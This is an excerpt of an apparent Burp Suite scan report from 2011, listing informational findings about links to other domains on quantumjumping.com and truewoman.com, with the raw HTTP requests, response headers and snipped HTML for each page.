<a href="http://www.facebook.com/profile.php?id=100000446605055" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195343_100000446605055_2503123_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/paulinejjohnstone" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187071_1798527771_3402167_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000228493086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203033_100000228493086_3276926_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002344565735" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002349914146" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186477_100002349914146_4065373_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001468085334" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001420203976" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41636_100001420203976_6544_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174463_751075160_782321_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

21.11. http://www.quantumjumping.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?whisper_action=1&target=Style&request=css HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:56 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 40103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
               <script
...[SNIP]...
<div class="fb-like"><iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2FBurtGoldmanFanPage&amp;layout=button_count&amp;show_faces=true&amp;width=90&amp;action=like&amp;font=lucida+grande&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
</div>

       
<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&amp;width=295&amp;colorscheme=light&amp;connections=15&amp;stream=false&amp;header=true&amp;height=377" scrolling="no" frameborder="0" style="border:none; overflow:hidden;background:#FFF; width:295px; height:377px;margin-left:15px" allowTransparency="false"></iframe>
...[SNIP]...
<p><a href="http://www.theamericanmonk.com">The American Monk</a> | <a href="http://blog.theamericanmonk.com">Blog</a>
...[SNIP]...
<p>
   Published by <a href="http://www.mindvalley.com">MindValley LC</a>
...[SNIP]...

21.12. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css?ver=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:58 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:59 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:53:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 35988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...
<div id="fb_share_1" style="float: right; margin-left: 10px;"><a name="fb_share" type="box_count" share_url="http://www.quantumjumping.com/whoops-404-error-2/" href="http://www.facebook.com/sharer.php" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','www.facebook.com']);">Share</a></div><div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script></div><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><iframe src="http://api.tweetmeme.com/button.js?url=http%3A%2F%2Fwww.quantumjumping.com%2Fwhoops-404-error-2%2F&amp;style=normal" height="61" width="50" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
<p id="idc-unavailable">This website uses <a href="http://intensedebate.com/">IntenseDebate comments</a>
...[SNIP]...
<span class="comment-author"><a href="http://www.yousouledout.com" onclick="javascript:_gaq.push(['_trackEvent','outbound-commentauthor','http://www.yousouledout.com']);" rel='external nofollow' class='url'>Kai</a>
...[SNIP]...
</div>
                       
                       <img alt='' src='http://1.gravatar.com/avatar/d10cee590d7f5deb9757cf80cdb02393?s=48&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D48&amp;r=G' class='avatar avatar-48 photo' height='48' width='48' />                        
                   </div>
...[SNIP]...
</div>
                       
                       <img alt='' src='http://0.gravatar.com/avatar/6e116535fa3ba01c342dce49d4f41e40?s=48&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D48&amp;r=G' class='avatar avatar-48 photo' height='48' width='48' />                        
                   </div>
...[SNIP]...
<p><img width="188" height="268" alt="" class="img-left no-border" style="height: 15em; width: auto;" src="http://e02.mindvalley.us/quantumjumpingcom/media/wp/uploads/2009/03/qj-box-small.png"></p>
...[SNIP]...
<div class="textwidget"><img style="width:100px;height:115px;color:#fff;font-size:2em;float:left;margin-right:10px" src="http://s99.mindvalley.us/quantumjumpingcom/media/wp/uploads/2009/12/burt1-small.jpg" alt="Burt Goldman" />
<p>
...[SNIP]...
</a>
                       
                       <a href="http://twitter.com/BurtGoldman" title="Follow Me On Twitter!"><img src="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/images/social/twitter.png" alt="Twitter" /></a>
                       <a href="http://www.facebook.com/BurtGoldmanFanPage" title="Be my friend on Facebook!"><img src="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/images/social/facebook.png" alt="Facebook" /></a>
                       
                       <a href="http://www.youtube.com/user/theamericanmonk" title="Subscribe to my channel on YouTube!"><img src="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/images/social/youtube.png" alt="YouTube" />
...[SNIP]...
</span>
<iframe src="http://www.facebook.com/plugins/fan.php?id=28843894233&amp;width=300&amp;connections=10&amp;stream=true&amp;header=false&amp;locale=en_US" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:300px; height:550px"></iframe>
...[SNIP]...
<div class="textwidget"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<p class="copyright">Copyright &copy; 2011 <a href="http://www.mindvalley.com">MindValley LC</a>
...[SNIP]...

21.13. http://www.quantumjumping.com/contact/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact/view

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /contact/view?tag=account&limit=5&title=Members+Area+and+Passwords HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.1.10.1304488444; __qca=P0-115106725-1304488446007

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 8020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<p><a href="http://www.theamericanmonk.com">The American Monk</a> | <a href="http://blog.theamericanmonk.com">Blog</a>
...[SNIP]...
<p>
   Published by <a href="http://www.mindvalley.com">MindValley LC</a>
...[SNIP]...

21.14. http://www.quantumjumping.com/customers/support/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /customers/support/article

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /customers/support/article?id=1343 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact/view?tag=account&limit=5&title=Members+Area+and+Passwords
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-115106725-1304488446007; __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.3.10.1304488444

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fcontact%2Fview%3Ftag%3Daccount%26limit%3D5%26title%3DMembers%2BArea%2Band%2BPasswords; expires=Wed, 04-May-2011 03:54:30 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 8515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<p>If you have lost, forgotten or never received a password to access your purchases, please go to the following link to retrieve it:
<a href="http://www.theamericanmonk.com/members/forgot-password">http://www.theamericanmonk.com/members/forgot-password</a>
...[SNIP]...
<p><a href="http://www.theamericanmonk.com">The American Monk</a> | <a href="http://blog.theamericanmonk.com">Blog</a>
...[SNIP]...
<p>
   Published by <a href="http://www.mindvalley.com">MindValley LC</a>
...[SNIP]...

21.15. http://www.truewoman.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?id=224 HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; __utmz=269886772.1304489524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269886772.1030400446.1304489524.1304489524.1304489524.1; __utmc=269886772; __utmb=269886772.1.10.1304489524; __qca=P0-1871447548-1304489525476

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:03 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 16082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
<h2 id="roh_logo"><a href="http://www.reviveourhearts.com" title="Revive Our Hearts"><span class="none">
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/TrueWomanMovement" title="join our facebook">Facebook</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/TrueWoman" title="follow us on twitter">Twitter</a>
...[SNIP]...
<li id="menu834"><a href="http://www.reviveourhearts.com/timesofrefreshing/" title="For Women's Ministry Directors">Women's Ministry Directors</a>
...[SNIP]...
</script>
<a href="http://www.addthis.com/bookmark.php" onclick="return addthis_open(this, 'email', '[URL]', '[TITLE]');" id="functionEmail">email page</a>
...[SNIP]...
</h2>


<a href="http://store.reviveourhearts.com/becominggodstruewoman.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96186.jpg" alt="Becoming God's True Woman " />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/voiceofthetruewomanmovement.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96312.jpg" alt="Voices of the True Woman Movement" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/biblicalportraitofwomanhood-packof10.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/85012.jpg" alt="Biblical Portrait of Womanhood 10 Pack (booklet)" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/biblicalportraitofwomanhoodbooklet.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/55610.jpg" alt="Biblical Portrait of Womanhood (booklet) " />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/liesyoungwomenbelieve.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96164.jpg" alt="Lies YOUNG Women Believe" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/liesyoungwomenbelievebookandcompanionguideset.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/85041.jpg" alt="Lies YOUNG Women Believe Book & Companion Guide Set" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/liesyoungwomenbelievecompanionguide.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96183.jpg" alt="Lies YOUNG Women Believe Companion Guide" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/whatsthedifferencemanhoodandwomanhood.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/56953.jpg" alt="What's the Difference" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/whatssubmissiongodtodowithit.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96178.jpg" alt="What's Submission Got to Do With It?" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/thetruewoman.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96182.jpg" alt="True Woman, The" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/brokennesssurrenderholinessareviveourheartstrilogy.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96181.jpg" alt="Brokenness - Surrender - Holiness: An ROH Trilogy" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/radicalwomanhood.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96185.jpg" alt="Radical Womanhood" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/barbaraandsusansguidetotheemptynest.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96175.jpg" alt="Barbara & Susan's Guide to the Empty Nest" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/thetruththatsetsyoufreebookmarks-50.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/55731.jpg" alt="BKMK - Truth That Sets Us Free (PK/50) (bookmark)" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/thecompanionguidetolieswomenbelieve.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/96022.jpg" alt="Lies Women Beliieve Companion Guide" />
...[SNIP]...
</a><a href="http://store.reviveourhearts.com/lieswomenbelieve-1.aspx?utm_source=TW-COM&utm_medium=LINK&utm_content=TW-COM&utm_campaign=TW-COM" class="store-item">
<img src="/assets/images/store/small/85028.jpg" alt="Lies Women Believe" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d5596c6511294d4"></script>
...[SNIP]...
<div id="today_roh">
<a href="http://www.reviveourhearts.com/" title="Today on Revive Our Hearts">Revive Our Hearts</a>
...[SNIP]...
<li><a href="http://www.reviveourhearts.com" id="roh" title="Revive Our Hearts"><span class="none">
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-92Hvqf_eJ8FUE.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

21.16. http://www.truewoman.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?id=1369 HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
Referer: http://www.truewoman.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; __utmz=269886772.1304489524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269886772.1030400446.1304489524.1304489524.1304489524.1; __utmc=269886772; __utmb=269886772.1.10.1304489524; __qca=P0-1871447548-1304489525476

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:02 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 87625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
<h2 id="roh_logo"><a href="http://www.reviveourhearts.com" title="Revive Our Hearts"><span class="none">
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/TrueWomanMovement" title="join our facebook">Facebook</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/TrueWoman" title="follow us on twitter">Twitter</a>
...[SNIP]...
<li id="menu834"><a href="http://www.reviveourhearts.com/timesofrefreshing/" title="For Women's Ministry Directors">Women's Ministry Directors</a>
...[SNIP]...
</script>
<a href="http://www.addthis.com/bookmark.php" onclick="return addthis_open(this, 'email', '[URL]', '[TITLE]');" id="functionEmail">email page</a>
...[SNIP]...
</p>

<a href="http://www.facebook.com/album.php?aid=297866&amp;id=119895196310" title="True Woman 2010 Conference Images"><img align="right" alt="Photo Gallery" height="416" src="/assets/images/banner-fort-worth.jpg" width="200" />
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--crawfordlorittscd.aspx" title="buy">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--crawfordlorittsdvd.aspx" title="buy">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencecdset.aspx">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencemp3cdset.aspx">MP3 CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencedvdset.aspx">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--nancyleighdemossthursdayeveningcd.aspx" title="buy">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--nancyleighdemossthursdaymessagedvd.aspx" title="buy">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencecdset.aspx">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencemp3cdset.aspx">MP3 CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencedvdset.aspx">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--karenloritts.aspx" title="buy">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--karenlorittsdvd.aspx" title="buy">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencecdset.aspx">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencemp3cdset.aspx">MP3 CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencedvdset.aspx">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--marykassiancd.aspx" title="buy">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--marykassiandvd.aspx" title="buy">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencecdset.aspx">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencemp3cdset.aspx">MP3 CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencedvdset.aspx">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--jamesmacdonaldcd.aspx" title="buy">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--jamesmacdonalddvd.aspx" title="buy">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencecdset.aspx">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencemp3cdset.aspx">MP3 CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencedvdset.aspx">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworth--kayarthurcd.aspx" title="buy">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworth--kayarthurdvd.aspx" title="buy">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencecdset.aspx">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencemp3cdset.aspx">MP3 CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencedvdset.aspx">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--nancyleighdemosssaturdaymorningcd.aspx" title="buy">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--nancyleighdemosssaturdaymessagedvd.aspx" title="buy">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencecdset.aspx">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencemp3cdset.aspx">MP3 CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--conferencedvdset.aspx">DVD</a>
...[SNIP]...
</strong> <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--paneldiscussioncd.aspx" title="buy">CD</a> | <a href="http://store.reviveourhearts.com/truewoman10fortworthconf--paneldiscussiondvd.aspx" title="buy">DVD</a>
...[SNIP]...
